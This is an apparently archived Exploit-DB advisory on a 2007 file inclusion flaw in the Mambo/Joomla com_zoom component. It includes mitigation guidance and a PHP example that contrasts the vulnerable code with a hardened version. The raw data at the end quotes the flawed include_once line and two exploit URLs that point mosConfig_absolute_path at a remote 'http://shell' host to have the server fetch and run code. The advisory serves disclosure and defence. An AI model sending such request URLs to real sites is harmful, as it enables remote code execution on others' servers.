By: iskorpitx
CVSS: 5.5 (MEDIUM)
Vulnerability class: File Inclusion, CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program)
Patch Exists: NO
Published: 2007

com_zoom file include

EXIF_Makernote.php and EXIF.php under components/com_zoom/classes/iptc/ build the argument of an include_once() from $mosConfig_absolute_path, the Mambo/Joomla 1.0 configuration global. Neither file checks that it was loaded through the CMS entry point, so when it is requested directly that global is never set by configuration.php and, with register_globals enabled, PHP fills it from the query string. A request that supplies mosConfig_absolute_path=http://<attacker host> therefore makes the script fetch and execute a remote file (where allow_url_fopen / allow_url_include permit it), and a local path gives local file inclusion on the server.

Mitigation:

Do not derive the include base from a global that the request can define. Put the standard Mambo/Joomla 1.0 guard, defined('_VALID_MOS') or die(...), at the top of both files so a direct request aborts before any include runs, and build the path from dirname(__FILE__) rather than from $mosConfig_absolute_path. At the platform level, run PHP with register_globals=Off and allow_url_include=Off (and allow_url_fopen=Off where the site does not need it); that removes the remote-inclusion vector even for unpatched copies of the component.
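The following is an added example, not code from com_zoom or from this advisory. It shows in one file how the include path ends up under request control and what the hardened version of the same step looks like. The function names, the extract() call standing in for register_globals, and the "http://shell" value are assumptions made for the demonstration.

```php
<?php
// Added example (not from com_zoom or the advisory): how the include base
// becomes attacker-controlled, and a hardened replacement for the same step.
//
// Mambo/Joomla 1.0 set $mosConfig_absolute_path in configuration.php, but
// EXIF.php / EXIF_Makernote.php can be requested directly, so that global is
// never initialised. With register_globals=On, PHP then populates
// $mosConfig_absolute_path from the query string.

// Vulnerable pattern (simplified from the component): the base path comes from
// an uninitialised global that the request is allowed to define.
function vulnerable_include_target(array $query_params)
{
    // extract() stands in for register_globals here: every request
    // parameter becomes a PHP variable, including $mosConfig_absolute_path.
    extract($query_params);
    return "$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php";
}

// Hardened pattern: refuse direct requests and derive the base path from the
// location of this file instead of from any global. The caller passes the
// returned path to include_once().
function hardened_include_target()
{
    // The Mambo/Joomla 1.0 entry point defines _VALID_MOS; a direct request
    // to this file never has it, so stop before touching any variable.
    defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

    // dirname(__FILE__) is fixed by where the file lives on disk and cannot be
    // influenced by the request, regardless of register_globals.
    $base   = dirname(__FILE__);
    $target = $base . '/EXIF.php';

    // Belt and braces: the resolved path must be an existing file inside $base,
    // which also rejects any http:// or ../ form of the target.
    $real = realpath($target);
    if ($real === false || strpos($real, realpath($base) . DIRECTORY_SEPARATOR) !== 0) {
        die('Refusing to include a file outside the component directory.');
    }
    return $real;
}

// Constructed hostile request, mirroring the advisory's URL shape.
// "http://shell" is an arbitrary attacker-controlled host.
$hostile = array('mosConfig_absolute_path' => 'http://shell');
echo vulnerable_include_target($hostile), "\n";
```

Run with php on the command line to see the vulnerable function hand back a remote URL as the include target; whether include_once() would then fetch it depends on allow_url_fopen (PHP before 5.2) or allow_url_include (PHP 5.2 and later). hardened_include_target() is deliberately not called from the top level, because outside the CMS _VALID_MOS is undefined and the guard dies, which is exactly the behaviour a direct request should get.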

Exploit-DB raw data:

iskorpitx@metlak
from TURKEY
com_zoom file include



******************************************************************************/

// Create the Makernote Parser and Interpreter Function Array

$GLOBALS['Makernote_Function_Array'] = array(   "Read_Makernote_Tag" => array( ),
                                                "get_Makernote_Text_Value" => array( ),
                                                "Interpret_Makernote_to_HTML" => array( ) );


// Include the Main TIFF and EXIF Tags array
// $mosConfig_absolute_path is never initialised when this file is requested
// directly; with register_globals=On its value comes straight from the query string.

include_once("$mosConfig_absolute_path/components/com_zoom/classes/iptc/EXIF.php");

/******************************************************************************

http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://shell*
http://www.example.com/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://shell*

iskorpitx

admin@siyamiozkan-mavideniz.org

# milw0rm.com [2007-04-11]